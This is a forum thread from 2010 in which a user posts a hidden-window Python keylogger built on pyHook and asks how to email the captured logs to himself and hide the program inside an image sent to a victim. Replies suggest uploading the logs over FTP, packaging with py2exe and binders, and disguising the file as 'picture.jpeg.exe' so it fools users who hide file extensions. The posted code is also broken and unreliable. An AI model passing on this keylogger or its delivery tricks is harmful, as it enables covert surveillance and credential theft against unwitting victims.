made a keylogger but need help

Bad threads go here

made a keylogger but need help

Post by darkmpulse1 on Wed Feb 24, 2010 6:09 pm
([msg=35699]see made a keylogger but need help[/msg])

Code: Select all
import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
    if event.Ascii==5:
        _exit(1)

        if event.Ascii != 0 or 8:
            f=open('c:\output.txt','r')
            buffer=f.read()
            f.close()
            f.close('c:\output.txt','[mail][/mail]w')
            keylogs=chr(event.Ascii)
            if event.Ascii==13:
                keylogs='/n'
                buffer += keylogs
                f.write(buffer)
                f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()


I watched the video here http://www.youtube.com/watch?v=5xy9w9-hzrs Can someone tell me how to make it send all the logs it gets to my email. Can i use the keylogger and combine it to a pic file and send it to someone. Once they open it, It will automatically start and give me logs.
darkmpulse1
New User
New User
 
Posts: 36
Joined: Mon Dec 28, 2009 10:35 am
Blog: View Blog (0)


Re: made a keylogger but need help

Post by insomaniacal on Wed Feb 24, 2010 6:26 pm
([msg=35704]see Re: made a keylogger but need help[/msg])

Google is your friend :).

One relatively promising example

However, you'll need an SMTP server, and many big providers (Hotmail for example) won't allow you to use their server directly because of spammers. It'd be much quicker to simply use FTP to upload the file somewhere.

You could bind it with a picture, but then it'd only work if the other person had python installed. Look into py2exe, and into binders in general.
It's not who votes that counts, it's who counts the votes
insomaniacal.blog.com
User avatar
insomaniacal
Addict
Addict
 
Posts: 1212
Joined: Sun May 24, 2009 10:21 am
Blog: View Blog (0)


Re: made a keylogger but need help

Post by darkmpulse1 on Wed Feb 24, 2010 7:13 pm
([msg=35709]see Re: made a keylogger but need help[/msg])

so that keylogger only works on people who have python. Well what is a good keylogger to use to put into pics, and what do you mean my gmail want let me get numerous emails.
darkmpulse1
New User
New User
 
Posts: 36
Joined: Mon Dec 28, 2009 10:35 am
Blog: View Blog (0)


Re: made a keylogger but need help

Post by insomaniacal on Wed Feb 24, 2010 9:00 pm
([msg=35715]see Re: made a keylogger but need help[/msg])

Any keylogger would work fine, but one you write yourself will always be best.

Seriously though, we're not here to spoon-feed you. Look up how email works, and read about spoofing emails, and why you can't just send messages directly with mail providers.
It's not who votes that counts, it's who counts the votes
insomaniacal.blog.com
User avatar
insomaniacal
Addict
Addict
 
Posts: 1212
Joined: Sun May 24, 2009 10:21 am
Blog: View Blog (0)


Re: made a keylogger but need help

Post by darkmpulse1 on Wed Feb 24, 2010 11:12 pm
([msg=35746]see Re: made a keylogger but need help[/msg])

lol i enjoy coming back to this site every now and then just to laugh (enough said) but anyways thanks you i'll look it up and you've been helpful.
darkmpulse1
New User
New User
 
Posts: 36
Joined: Mon Dec 28, 2009 10:35 am
Blog: View Blog (0)


Re: made a keylogger but need help

Post by sanddbox on Wed Feb 24, 2010 11:17 pm
([msg=35748]see Re: made a keylogger but need help[/msg])

You won't be able to make it so that it runs whenever someone views a picture.
Image

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat
User avatar
sanddbox
Expert
Expert
 
Posts: 2354
Joined: Sat Jul 04, 2009 5:20 pm
Blog: View Blog (0)


Re: made a keylogger but need help

Post by insomaniacal on Thu Feb 25, 2010 7:39 am
([msg=35765]see Re: made a keylogger but need help[/msg])

There's sorta kinda a way to do this. It involves binding the .exe of the keylogger with a picture, and then when someone opens the picture, the program is run alongside of the picture being opened. However, the file has to be saved something like this: picture.jpeg.exe , and you have to hope that the person has the option of hiding file-extensions on.
It's not who votes that counts, it's who counts the votes
insomaniacal.blog.com
User avatar
insomaniacal
Addict
Addict
 
Posts: 1212
Joined: Sun May 24, 2009 10:21 am
Blog: View Blog (0)


Re: made a keylogger but need help

Post by darkmpulse1 on Fri Mar 05, 2010 11:36 pm
([msg=36173]see Re: made a keylogger but need help[/msg])

Alright so this time i downloaded http://securityoverride.com/infusions/p ... php?did=32 and then compiled it with dev- C++ like it tells me to but im haveing problems with the compiling part. How, and what am i supposed to do?
darkmpulse1
New User
New User
 
Posts: 36
Joined: Mon Dec 28, 2009 10:35 am
Blog: View Blog (0)


Re: made a keylogger but need help

Post by Monica on Sun Mar 07, 2010 1:38 am
([msg=36237]see Re: made a keylogger but need help[/msg])

There's a thing called "learning." Heard of it?

Other note -- You've posted twice regarding this topic. Refrain from posting the same topic.
hi am new so plz dont troll me or i report 2 the HTS mods ty
User avatar
Monica
Contributor
Contributor
 
Posts: 890
Joined: Thu Oct 02, 2008 12:29 am
Location: In The Shadows
Blog: View Blog (0)


Re: made a keylogger but need help

Post by insomaniacal on Sun Mar 07, 2010 7:17 am
([msg=36250]see Re: made a keylogger but need help[/msg])

darkmpulse1 wrote:Alright so this time i downloaded http://securityoverride.com/infusions/p ... php?did=32 and then compiled it with dev- C++ like it tells me to but im haveing problems with the compiling part. How, and what am i supposed to do?


The compiler will give you errors telling you at which line (and usually it gets more specific than that), there is an error. Go to that line, correct the mistakes in the code, and try compiling again.

That's the only way to do it.
It's not who votes that counts, it's who counts the votes
insomaniacal.blog.com
User avatar
insomaniacal
Addict
Addict
 
Posts: 1212
Joined: Sun May 24, 2009 10:21 am
Blog: View Blog (0)


Next

Return to Graveyard

Who is online

Users browsing this forum: No registered users and 0 guests